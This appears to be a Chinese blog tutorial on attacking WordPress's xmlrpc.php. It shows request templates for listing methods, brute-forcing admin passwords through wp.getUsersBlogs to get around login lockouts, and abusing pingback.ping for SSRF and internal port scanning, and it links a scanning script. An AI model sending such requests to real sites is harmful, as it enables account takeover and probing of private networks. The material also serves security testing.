WordPress|WordPress xmlrpc.php 漏洞利用
WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。 所以,你可要通过客户端来管理Wordpress。 通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端Weblog Clients来发布你的WordPress日志和页面。同时,XML-RPC 也可使用extended by WordPress Plugins插件来自定义你的规则。0X01 激活XML-RPC 从3.5版本开始,XML-RPC功能默认开启。 早些版本,可通过如下方法激活:Settings > Writing > Remote Publishing and check the checkbox.
路径:http://example.com/wordpress/xmlrpc.php
文章图片
image.png 0x02 查看系统允许的方法
POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
system.listMethods
文章图片
image.png 0x03 账号爆破 一般情况下,wordpress的管理后台都会设置账号登录失败次数限制,因此,可以通过xmlprc.php接口来进行爆破。通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破,也可以使用其他的方法。
构造请求包:
POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
wp.getUsersBlogs admin password
文章图片
image.png 爆破成功会返回博客的内容:
文章图片
image.png 0x03 SSRF WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
构造请求包:
POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
pingback.ping 要探测的ip和端口:http://127.0.0.1:80
网站上一篇博客的URL:http://localhost/wordpress/?p=1)
IP和端口存在,返回包中的
文章图片
image.png
利用脚本:
https://github.com/FireFart/WordpressPingbackPortScanner
0x04 读取文件:
文章图片
image.png
文章图片
image.png 0x99 参考:
【WordPress|WordPress xmlrpc.php 漏洞利用】https://codex.wordpress.org/zh-cn:XML-RPC_Support
http://xmlrpc.com/
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
https://www.acunetix.com/blog/web-security-zone/wordpress-pingback-vulnerability/
http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html
推荐阅读
- CVE-2020-16898|CVE-2020-16898 TCP/IP远程代码执行漏洞
- 难道你仅会钻规则的漏洞吗()
- WordPress安装后必须要做的10件事
- PHP|PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
- web挖洞|HACK学习黑帽子Python--漏洞检测脚本快速编写
- heap|heap uaf
- 第一篇文章WordPress|第一篇文章WordPress 博客的搭建
- s2-045漏洞的复现及其修复
- 墨者学院-CMS系统漏洞分析溯源(第8题)
- Tomcat|Tomcat AJP协议漏洞分析与利用